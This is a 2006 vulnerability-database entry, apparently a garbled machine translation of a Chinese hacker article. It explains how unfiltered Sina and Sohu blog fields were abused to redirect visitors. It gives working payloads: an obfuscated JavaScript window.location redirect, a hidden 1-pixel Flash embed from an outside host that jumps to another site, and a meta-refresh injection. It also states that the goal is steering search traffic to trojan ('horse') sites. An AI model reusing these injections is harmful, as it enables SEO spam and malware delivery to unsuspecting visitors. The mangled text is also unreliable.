The use of Sina, Sohu domain steering-vulnerability warning-the black bar safety net

2006-07-19T00:00:00
ID MYHACK58:62200610529
Type myhack58
Reporter 佚名
Modified 2006-07-19T00:00:00

Description

Article author: light and shadow Sources of information: the Red wolf security group www.wolfexp.net)

To 1. Sina blog is an unfiltered script That simple point of it, the previous time to engage google cheat time want to use sina domain name turning. Because the blog's pr value is generally high, in Baidu and Google weights are large, so I'm doing search engine Qin cheat when Want to use sina, and sohu blog name turned to my Station, and later found new links the description of the places is not filtered, I added the following statement to turn my Station.

CODE: <script language=JavaScript>document. write(’<sc’+’ript>’+’win’+’dow. loc’+’ation="<http://hacker566.blog.sohu.com>the"</’+’scr’+’ipt>’);</script>

[Copy to clipboard]

2。 Sohu flansh of the geturl function. In the baidu found on the same keyword rankings cheat powerful Station, which has a is used in the sohu blog domain name turning. Thus in many places have tried to code, but he has to filter. Opened a sohu blog domain name, while also not turning it money, view the source code, found the following code.

CODE: <embed style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 400px; HEIGHT: 3px; TEXT-ALIGN: center" src="<http://www.google90.com/80.swf>" width="4 0 0" height="1" type="application/x-shockwave-flash" loop="false" autostart="false"></embed>

[Copy to clipboard]

Log in to join this FLANSH http://www.google90.com/80.swf 把 FLANSH 下 下来 后 发现 他 的 文件 很 小 open to jump directly to another station, ha ha, what all understand. The original directly on the log inserting a width="4 0 0" height="1"FLANSH, and FLANSH with the geturl function to jump directly to the...... The other blog domain name it is easier to use, and edit CSS style of the time in which the addition of the following code is OK.

CODE: <meta http-equiv=refresh content=0;url=http://www. xxxx9. com/>

[Copy to clipboard]

ps:the blog's pr value is relatively large, so in search of permission is relatively large, the use of the application of the free blog plus popular keywords Turning to our network of of horses that... HOHO......